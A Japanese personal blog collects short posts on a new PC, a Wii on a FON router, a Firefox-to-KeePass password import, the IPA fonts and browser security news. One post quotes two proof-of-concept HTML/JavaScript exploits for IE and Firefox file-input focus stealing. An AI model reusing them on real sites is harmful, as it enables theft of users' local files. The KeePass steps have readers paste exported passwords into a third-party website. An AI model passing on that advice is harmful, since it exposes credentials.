PC購入
お久しぶりです。夏樹です。
愛用していたVersaProのHDDが壊れてしまったので新しいPCを購入しました。
主なスペック
CPU:Core 2 Quad Q6600
メモリ:DDR2-800 1Gx4
グラボ:GeForce 7600 GS
HDD1:500GB
HDD2:500GB
OS:WinXPpro
ノートPCが壊れたにもかかわらずデスクトップPCを購入するという愚行をしてしまいPCの置き場がないのですが。
今は、直に床置きしてます。
新しいPCデスクを買わなくては…。
しかも、なかなか無い大きなPCケースを使っていたりと。
一部では人気があるみたいですが、Antec P182というケースです。
Antec P182 ガンメタル 製品情報 - デュアルチェンバー構造、三層の遮音パネルを搭載
Vistaと迷ったのですが結局XPを購入してしまいました。
Vistaは先送りですね。待ってる間にWin7が発売されたりして。
ということで、Core 2 Quad Q6600で快適なPCライフが楽しめそうです。
Wii x FON
15日にWiiを購入しました。
Wiiは常時ネットに繋げる方が楽しそうなので繋げる事に。
しかし、私のネット環境は全部有線なのでWiiをそのまま繋げる事が出来なかったりします。
と、言う事で、去年の12月15日にタダで手に入れたFONのルータLa Foneraを使う事にした。
FONが日本上陸した時に無料配布していたのでそれを手に入れたは良いが、まだ使う機会がなかったのでちょうど良い機会だと思って。
La Foneraをモデムと接続して初期設定をすませてWiiを起動。
Wiiのネット設定をすませてネット環境が整った。
思った以上に簡単にWiiが繋がったので良かった。
しばらくは、Wiiで遊ぶ予定だったりします。
まだDS持っていないのでDSを買ったら無線の設定を変えて遊ぼうと思います。
FirefoxのパスワードをKeePassにインポート
Fyneworks Blog: Import Firefox passwords into KeePassから。
KeePassとは、フリーでオープンソースな軽量で使いやすいパスワードマネージャです。
普段私が使うパスワードはすべてこのソフトに任せています。
しかし、FirefoxでブラウザしているとついついFirefoxのパスワードマネージャに保存してしまうものなんですよね。
で、パスワードをバックアップをとるためにも、Firefoxのパスワードマネージャに保存してあるものもKeePassで管理したくなったのですが、簡単にはいきませんでした。*1
手順
1.Password Exporter :: Firefox Add-onsをFirefoxに導入する。
これでFirefoxのパスワードマネージャに保存してあるパスワードがエクスポート出来る様になります。
2.FirefoxのパスワードをXMLフォーマットでエクスポートする。
3.Import Firefox Passwords into Keepassにアクセスする。
4.エクスポートしたXMLファイルをテキストエディタ*2で開く。
5.XMLの内容を3.のサイトの左側のテキストエリアに貼り付ける。
6.左側にある「Convert to KeePass CSV」でCSV形式に変換される。
7.右側のテキストエリアの文字列をコピー
8.新規なテキストに7.でコピーしたものを貼り付ける。
9.適当な名前を付けて保存する。ex:firefox.csv
10.KeePassを起動する。
11.[ファイル]-[インポート]-[CSVファイル]をたどり先ほどのCSVをインポートする。
12.完了!!
- -
文章まとめるのが下手でごめんなさいorz
高品位なフォント「IPAフォント」を一般向けに無償公開
今までは使用に制限がありましたが、一般に公開されましたので誰でも利用できるようになりました。
好きずきはあると思いますが、個人的に好きなフォントですので公開されて嬉しい限り。
IE OnKeyDownイベントの脆弱性
Internet Explorer "OnKeyDown" Event Focus Weakness
この脆弱性により、攻撃者が任意のファイルにアクセスすることが出来る様になる可能性があります。
また、それにより、任意のファイルを悪意のある Web サイトにアップロードをする可能性があります。
exploit
<script> function Clear() { document.getElementById("label1").htmlFor="file1"; document.getElementById("text1").focus(); } function Down() { document.getElementById("file1").focus(); } </script> <form> <input type="file" id="file1" name="file1" onkeydown="Clear()" onkeyup="Clear()" /> <label id="label1" name="label1"></label> <br /> <textarea name="text1" id="text1" onkeydown="Down()"> </textarea> </form>Internet Explorer File Focus Stealing.
ちなみに、Firefoxにも似た脆弱性が確認されています。
Firefox "OnKeyDown" Event Focus Weakness
exploit
<script> function restore() { document.getElementById("text1").value=document.getElementById("file1").value; document.getElementById("text1").focus(); } function doKeyDown() { document.getElementById("label1").focus(); } </script> <input type="file" id="file1" name="file1" onkeydown="restore();" onkeyup="restore()" /> <label for="file1" id="label1" name="label1"></label> <br> <textarea name="text1" id="text1" onkeydown="doKeyDown()"> </textarea>Firefox file input focus vulnerabilities
発見者はOperaを使う事をすすめています。
私は、JavaScriptを無効化したり、信用出来ないサイトではファイルのアップデートをしない事をすすめます。
Security Update for QuickTime 7.2 for Windows
FirefoxとQuickTime悪用のエクスプロイトが公開
続 FirefoxとQuickTime悪用のエクスプロイトが公開
で、書いた脆弱性が修正されました。
WindowsでQuickTimeを利用している方は、確実にアップデートしましょう。
また、現在iTunes 7.4.3 for WindowsなどのQuickTimeはアップデートされたものに差し変わっていないので注意。
Apple - Support - Downloads - Security Update for QuickTime 7.2 for Windowsで、最新版のQuickTimeを入手出来ます。
関連サイト:
About Security Update for QuickTime 7.2 for Windows
QuickTime 'qtnext' Parameter Lets Remote Users Execute Arbitrary Commands
Apple QuickTime "qtl" File Handling Remote Command Injection Vulnerability